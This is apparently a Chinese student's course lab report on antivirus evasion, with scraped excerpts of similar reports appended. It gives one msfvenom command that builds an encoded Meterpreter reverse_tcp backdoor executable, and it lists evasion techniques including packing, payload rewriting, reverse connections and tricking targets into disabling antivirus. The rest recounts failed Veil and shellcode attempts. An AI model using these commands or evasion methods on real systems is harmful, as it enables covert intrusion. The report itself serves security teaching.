免杀原理与实践

Exp3 免杀原理与实践

一、实践内容

1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;

2.通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)

3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

二、基础问题回答

1.杀软是如何检测出恶意代码的?

基于特征码的检测

启发式恶意软件的检测

基于行为的恶意软件检测。

2.免杀是做什么?

一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。

要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。

反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。

3.免杀的基本方法有哪些?

就常见恶意软件而言,一般AV的检出率为40%-98%。就算你用了最好的AV,恶意软件依然有1/50的概率通过检测。这个概率还可以,貌似多试几种恶意软件就可以了。那免杀的方法当然是针对检测技术的。

--

所以总体技术有:

改变特征码

如果你手里只有EXE

加壳:压缩壳 加密壳

有shellcode(像Meterpreter)

用encode进行编码

基于payload重新编译生成可执行文件

有源代码

用其他语言进行重写再编译(veil-evasion)

--

改变行为

通讯方式

尽量使用反弹式连接

使用隧道技术

加密通讯数据

操作模式

基于内存操作

减少对系统的修改

加入混淆作用的正常功能代码

--

免杀就是让安插的后门不被AV软件发现。除了直接使用现有后门软件外,还有一些方式,在实际中也有用。

非常规方法

使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。

使用社工类攻击,诱骗目标关闭AV软件。

纯手工打造一个恶意软件

--

留后门的思路是这样的:

你写一个有漏洞的软件,开一个服务端口。这个软件本身没问题。然后如果这个端口被攻击,就可以获得系统控制权。

通过meterpreter这种驻留内存的payload,AV软件很难检出。

这样的小漏洞程序大家也有做,自己攻击自己还是很容易的。

当然最好的方法,还是手工打造,自己从头编一个,没有通用工具的特征,AV软件也就杀不出来了。

从头打造当然是相当有难度的,但我们可以利用Metasploit已有的payload来半手工的打造,效果也不错

实验步骤:

一:利用上次实验的后门程序,用msf对其进行编码:

Msfvenom是Metasploit平台下用来编码payloads免杀的工具。

# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai  -b ‘\x00’ LHOST=172.30.3126  LPORT=1120 -f exe >xm1120_backdoor.exe

将其上传到https://www.virustotal.com/ http://www.virscan.org/

上进行检测,我选择了后一个中文网站结果如下

使用msf编码十次:

效果一如既往的被查杀,曝光率没变。。。。。。。

二:使用Veil-Evasion

Veil-Evasion是一个免杀平台,与Metasploit有点类似,在Kalil软件库中有,但默认没装。免杀效果比较好。官网上有视频教程。

结果呢,生成了一个,上传测试,virustoal检出为19/57。

Veil-evasion是用其他语言如c,c#,phython,ruby,go,powershell等重写了meterperter,然后再通过不同方式编译成exe,共性特征比较少。

装veil 血泪史:参考https://github.com/veil-Framework/veil上的方法

在cd veil 时,若找不到veild的路径,

输入:whereis veil即可

接下来

建议大家用流量,因为在这一步时特别缓慢,要下载很大的内容,

在装python时我很奇怪它的默认安装路径时以windows系统的c:\........开始的,我觉得既然是在linux下开始的话,也应该是root/....很奇怪,更让我生气地是装了veil后,我的msf不能用了,捣鼓了一整天,我的kali崩了,然而之前我把自己的快照失手删了,完蛋。。。。。

哟:牺牲的msf:

还好我装了两个kali。已经牺牲了一个,让我觉得。。。。心累

继续:输入veil:

然后,按照提示步骤来呗

选择 28

出现了分歧:选1呢还是2呢,都试试吧

貌似1有问题嘞

所以选2

但这两个都没产生.exe文件,我也不明吧,我觉得很可能是python没安装成功的问题,在博客中有人说用c,我试了试,

然而,没用的啦,依旧被发现

三:用c调用msf生成的shellcode编写后门程序进行测试

我用的是codeblock编译的,没有用vs

最初时,没有被360发现,但是过了一天,就被360发现删除了。。。。。。

四.加壳

呵呵,没用啊!

实验体会:

我觉得,这次实验原理很易懂,但操作有些复杂,不知为啥,强大的杀毒软件将我击败了,其实在前几天,360是没发现veil编码以及c调用shellcode 的免杀方式的,只不过当我处理其他事情的时候,360后来才发现的,导致我没能逃掉免杀,这也说明,当出现新的病毒时,杀毒软件有一段滞后期,若黑客能在滞后期期间完成攻击任务,杀毒软件便没了意义。所以还是要加强安全意识,不要下载陌生程序代码,毕竟在滞后期内,杀软无能为力。

但是我牺牲了一个kali,这让我无语,只好从头再来了

原文地址:https://www.cnblogs.com/x-x-m-m/p/8782683.html

时间: 2024-10-29 02:31:07

免杀原理与实践的相关文章

20145309《网络对抗技术》免杀原理与实践

20145309<网络对抗技术>免杀原理与实践 1.基础问题回答 (1)杀软是如何检测出恶意代码的? 根据特征来检测:对已存在的流行代码特征的提取与比对根据行为来检测:是否有更改注册表行为.是否有设置自启动.是否有修改权限等等 (2)免杀是做什么? 使用一些方法使得恶意程序不被杀软和防火墙发现,避免被查杀. (3)免杀的基本方法有哪些? 加壳:就是相当于把你的后门代码封装起来,但是现在大部分公开的壳都能被杀毒软件查出来,所以加这些壳还不如不加:加花指令:就是加一段垃圾代码,但是并不影响程序的正

20145331魏澍琛《网络对抗》——免杀原理与实践

20145331魏澍琛<网络对抗>--免杀原理与实践 问题回答 1.杀软是如何检测出恶意代码的? 一个是基于特征码的检测,第二个是启发式恶意软件检测,最后是基于行为的恶意软件检测 2.免杀是做什么? 让病毒不被杀毒软件kill掉 3.免杀的基本方法有哪些? a)可以用这次实验所涉及的改变特征码 b)加壳:就是相当于把你的后门代码封装起来,但是现在大部分公开的壳都能被杀毒软件查出来,效果其实不好 实践过程 一.使用msf生成后门程序的检测 1.用上节课所讲的msf生成一个后门 2.到相应网站上查

20145239杜文超《网络对抗》- 免杀原理与实践

<网络对抗>- 免杀原理与实践 基础问题回答 (1)杀软是如何检测出恶意代码的? 根据搜集来的最全的.最新的特征码库,检测程序有没有异常或者可疑的行为. (2)免杀是做什么? 利用一些手段,让你的的后门不被AV软件发现. (3)免杀的基本方法有哪些? 加壳.用其他语言进行重写再编译. 使用反弹式连接. 自己手工编一个. 实践总结与体会 这次的免杀实验做得非常顺利,每一个步骤基本上都一次成功,虽然这正是我所希望的但也有不好就是万一下次遇到问题可能不会解决,毕竟遇到问题.解决问题的过程才能让学习的

Exp3 免杀原理与实践

Exp3 免杀原理与实践 这次的实验令我非常兴奋,因为要对抗的是各大杀毒软件厂商,所以事先得做好很多功课.另一方面我也想看看metasploit在这场猫鼠游戏中能不能走在安全厂商的前面. 这次的目标免杀平台是64位windows 7 SP1,我用的windows 7 SP1虚拟机中事先装了一下杀毒软件: 火绒 版本:4.0.55.0 360安全卫士 版本:11.4.0.2002 -- 必须连上互联网才能正常工作 在线检测: Virustotal (www.virustotal.com) Virs

网络对抗 Exp3 免杀原理与实践 20154311 王卓然

Exp3 免杀原理与实践 一.基础问题回答 (1)杀软是如何检测出恶意代码的?  ①基于特征码的检测:AV软件厂商通过检测一个可执行文件是否包含一段与特征码库中相匹配的特征码从而判断是否为恶意软件.  ②启发式恶意软件检测:就是根据一个程序的特征和行为如果与恶意软件相似,就判定为恶意软件. ③基于行为的恶意软件检测:同启发式,启发式偏向于对程序的特征扫描,基于行为的则是多了对程序的行为监控. (2)免杀是做什么? 免杀就是使恶意软件能不被AV软件的检测出来,其本身安装的后门能够不被发现,成功存活

2017-2018-4 20155317《网络对抗技术》EXP3 免杀原理与实践

2017-2018-4 20155317<网络对抗技术>EXP3 免杀原理与实践 一.问题回答 (1)杀软是如何检测出恶意代码的? (2)免杀是做什么? (3)免杀的基本方法有哪些? 2.实践 (1) 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 首先尝试一下自己上个实验做出的后门程序 果然是不堪一击...拿去检测一下 装上veil尝试一下结果会如何 : 温馨提示一下,刚开始我是用的自己装的64的ka

2017-2018-2 《网络对抗技术》 20155322 Exp3 免杀原理与实践

#2017-2018-2 <网络对抗技术> 20155322 Exp3 免杀原理与实践 [-= 博客目录 =-] 1-实践目标 1.1-实践介绍 1.2-实践内容 1.3-实践要求 2-实践过程 2.1-正确使用msf编码器 2.2-veil-evasion 2.3-组合应用技术实现免杀 2.4-靶机实测 2.5-基础问题回答 3-资料 1-实践目标 1.1-实践介绍:免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清楚杀毒软件(恶意软件

20154307《网络对抗》Exp3 免杀原理与实践

20154307<网络对抗>Exp3 免杀原理与实践 一.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测:杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配,就会把该程序当作恶意软件. 启发式恶意软件检测 基于行为的恶意软件检测:检测程序是否会有一些恶意行为,如修改注册表,更改权限等等.. (2)免杀是做什么? 让攻击程序不被杀软查杀 (3)免杀的基本方法有哪些? 加壳 改变特征码 二.实践内容 1.使用msf生成后门程序的检测 由于上一个实验我们已经用msf生成了一

Exp3 免杀原理与实践20154302薛师凡

Exp3 免杀原理与实践20154302薛师凡 一.实践目标与内容 利用多种工具实现实现恶意代码免杀 在另一台电脑上,杀软开启的情况下,实现运行后门程序并回连成功. 在保证后门程序功能的情况下实现杀软共存. 二.实践过程与步骤 1.使用msf编码器生成的后门程序 上次实践生成的后门程序,直接被360发现了,在virscan网站扫描,也有17个杀毒引擎识别了出来,很容易被辨识出来的. 2.使用veil-evasion生成的后门程序 2.1安装veil平台 apt-get install veil-

Exp3 免杀原理与实践 20154301仉鑫烨

20154301 Exp3 免杀原理与实践 仉鑫烨 一. 实践内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧; 通过组合应用各种技术实现恶意代码免杀; 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本. 二. 基础问题 杀软是如何检测出恶意代码的? 答:①基于特征码检测:如果一个可执行文件包含一段特征码则被认为是恶意代码,过时的特征码库就是没有用的,因此杀毒软件的更新很